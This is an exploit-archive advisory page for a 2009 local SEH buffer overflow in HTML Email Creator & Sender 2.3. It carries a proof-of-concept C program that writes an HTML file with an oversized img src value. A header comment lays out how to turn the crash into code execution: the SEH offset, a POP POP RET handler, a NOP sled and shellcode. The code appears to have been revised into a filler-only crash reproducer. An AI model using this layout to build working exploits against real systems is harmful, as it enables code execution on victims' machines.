
HTML Email Creator/Sender 2.3 Buffer Overflow

🗓️ 18 Aug 2009 00:00:00Reported by fl0 fl0wType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

HTML Email Creator/Sender 2.3 Buffer Overflow Debu

Code
` /*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc  
********************************************************************  
Debugging info  
The SEH handler is overwritten; the offset is at 60 bytes into our buffer,  
so you have to build your buffer as follows:  
[PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE]  
| | | |  
JMP 4 bytes POP POP RET 50*0x90 calc.exe   
*********************************************************************  
Code execution is possible.  
CPU Registers  
EAX 00000000  
ECX 00000208  
EDX 00000000  
EBX 00000029  
ESP 0012E224  
EBP 7C8101B1 kernel32.lstrcpynA  
ESI 90909090 <------------------CONTROLLED  
EDI 00001209  
EIP 0042E1C7 HtmlEmai.0042E1C7  
*/  
  
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <getopt.h>
#include <windows.h>
/* Four one-byte fields; Fbuild sets them to 0x48 0x54 0x4D 0x4C, the ASCII bytes of "HTML". */
typedef struct Start {
    uint8_t sh, st, sm, sl;
} HTML;
  
/* Four one-byte fields; Fbuild sets them to 0x48 0x45 0x41 0x44, the ASCII bytes of "HEAD". */
typedef struct Middle {
    uint8_t sh, se, sa, sd;
} HEAD;
  
/* Four one-byte fields; Fbuild sets them to 0x42 0x4F 0x44 0x59, the ASCII bytes of "BODY". */
typedef struct End {
    uint8_t sb, so, sD, sy;
} BODY;
/* Size in bytes (0x1A0A = 6666) of the heap buffer Fbuild assembles the output file in. */
#define BUFFERSIZE 0x1A0A
/*
 * NOTE(review): never referenced in this file. `29A` is not a valid C constant,
 * so any use of this macro would fail to compile -- presumably 0x29A was meant; confirm.
 */
#define FILESIZE 29A
/* Never referenced in this file; Fbuild writes the same nine bytes from a local byte array. */
#define SRC "<img src="
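/*
 * Copy `len` bytes from `src` to `buf + *off` and advance `*off`.
 * Returns 0 on success, or -1 without writing if the bytes would not fit in `cap`.
 */
static int fbuild_append(char *buf, size_t cap, size_t *off, const void *src, size_t len)
{
    if (*off > cap || len > cap - *off) {
        return -1;
    }
    memcpy(buf + *off, src, len);
    *off += len;
    return 0;
}

/*
 * Write the reproduction file for the advisory in the file header to `fname`.
 *
 * The output is a minimal HTML skeleton whose <img src="..."> value is 4616
 * bytes of 0x41. Only filler is written -- no handler address and no payload --
 * so the file is suited to checking whether a given build of the target still
 * faults on an oversized attribute value.
 *
 * Fixes relative to the published listing:
 *   - the tag bytes were copied with sizeof(pointer) instead of the struct
 *     size, which reads past the 4-byte allocation on 64-bit builds;
 *   - the offset was advanced by two after the final '>', so one
 *     uninitialised heap byte was written to the file; an explicit NUL is
 *     written in that position instead, keeping the file length unchanged;
 *   - every append is bounds-checked against BUFFERSIZE;
 *   - write results are checked, the file is closed and the buffer freed.
 *
 * NOTE(review): the closing tags use a backslash ("<\HEAD>") rather than '/',
 * exactly as published; kept byte-for-byte.
 *
 * Exits the process with status -1 on a NULL name or on allocation, open,
 * or write failure.
 */
void Fbuild(char *fname)
{
    enum { SRC_FILL_LEN = 4616 };

    struct piece {
        const void *data;
        size_t len;
    };

    /* Tag names carried in the file's one-byte-per-field structs. */
    const HTML ht_ml = { .sh = 0x48, .st = 0x54, .sm = 0x4D, .sl = 0x4C }; /* "HTML" */
    const HEAD he_ad = { .sh = 0x48, .se = 0x45, .sa = 0x41, .sd = 0x44 }; /* "HEAD" */
    const BODY bo_dy = { .sb = 0x42, .so = 0x4F, .sD = 0x44, .sy = 0x59 }; /* "BODY" */
    const uint8_t img_open[] = { 0x3C, 0x69, 0x6D, 0x67, 0x20, 0x73, 0x72, 0x63, 0x3D }; /* "<img src=" */
    const char pad = '\0';

    /* Everything up to and including the opening quote of the src value. */
    const struct piece before_fill[] = {
        { "<", 1 }, { &ht_ml, sizeof ht_ml }, { ">", 1 },
        { "<", 1 }, { &he_ad, sizeof he_ad }, { ">", 1 },
        { "<", 1 }, { "\\", 1 }, { &he_ad, sizeof he_ad }, { ">", 1 },
        { "<", 1 }, { &bo_dy, sizeof bo_dy }, { ">", 1 },
        { img_open, sizeof img_open },
        { "\"", 1 },
    };
    /* Closing quote, closing tags, and the defined padding byte. */
    const struct piece after_fill[] = {
        { "\"", 1 }, { ">", 1 },
        { "<", 1 }, { "\\", 1 }, { &bo_dy, sizeof bo_dy }, { ">", 1 },
        { "<", 1 }, { "\\", 1 }, { &ht_ml, sizeof ht_ml }, { ">", 1 },
        { &pad, 1 },
    };

    if (fname == NULL) {
        fprintf(stderr, "Fbuild: no output file name\n");
        exit(-1);
    }

    char *memBuffer = malloc(BUFFERSIZE);
    if (memBuffer == NULL) {
        fprintf(stderr, "Fbuild: out of memory\n");
        exit(-1);
    }

    size_t offset = 0;
    int rc = 0;

    for (size_t i = 0; rc == 0 && i < sizeof before_fill / sizeof before_fill[0]; i++) {
        rc = fbuild_append(memBuffer, BUFFERSIZE, &offset, before_fill[i].data, before_fill[i].len);
    }

    /* The oversized attribute value: SRC_FILL_LEN bytes of 'A'. */
    if (rc == 0 && (size_t)SRC_FILL_LEN <= (size_t)BUFFERSIZE - offset) {
        memset(memBuffer + offset, 0x41, SRC_FILL_LEN);
        offset += SRC_FILL_LEN;
    } else {
        rc = -1;
    }

    for (size_t i = 0; rc == 0 && i < sizeof after_fill / sizeof after_fill[0]; i++) {
        rc = fbuild_append(memBuffer, BUFFERSIZE, &offset, after_fill[i].data, after_fill[i].len);
    }

    if (rc != 0) {
        fprintf(stderr, "Fbuild: content does not fit in BUFFERSIZE\n");
        free(memBuffer);
        exit(-1);
    }

    FILE *f = fopen(fname, "w");
    if (f == NULL) {
        fprintf(stderr, "Fbuild: cannot open %s for writing\n", fname);
        free(memBuffer);
        exit(-1);
    }

    /* Body first, then the single trailing NUL the original also wrote. */
    int write_ok = fwrite(memBuffer, 1, offset, f) == offset
                && fwrite("\x00", 1, 1, f) == 1;
    if (fclose(f) != 0) {
        write_ok = 0;
    }
    free(memBuffer);

    if (!write_ok) {
        fprintf(stderr, "Fbuild: write to %s failed\n", fname);
        exit(-1);
    }

    printf("File Done!\n");
}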
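/*
 * Entry point: print the banner, then write the reproduction file named by argv[1].
 *
 * Returns 0 after Fbuild completes, or -1 (with a usage line on stderr) when
 * no file name is given.
 */
int main(int argc, char *argv[])
{
    /*
     * The original shelled out to system("CLS") to clear the console; that is
     * Windows-only and spawns a command interpreter for a cosmetic effect, so
     * it is dropped.
     */
    fprintf(stdout, ":: ::\n");
    /*
     * The published banner named a different product ("Embedthis Appweb Remote
     * Stack Overflow POC"); corrected to match the title in the file header.
     */
    fprintf(stdout, "HTML Email Creator & Sender v2.3 Local Buffer Overflow POC\n");
    fprintf(stdout, "All Credits:fl0 fl0w\n");
    fprintf(stdout, ":: ::\n");

    /* Validate the argument count before touching argv[1]. */
    if (argc < 2) {
        fprintf(stderr, "Usage is %s filename.html\n", argc > 0 ? argv[0] : "poc");
        return -1;
    }

    Fbuild(argv[1]);
    return 0;
}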
  
`


18 Aug 2009 00:00Current
0.9Low risk
Vulners AI Score0.9
17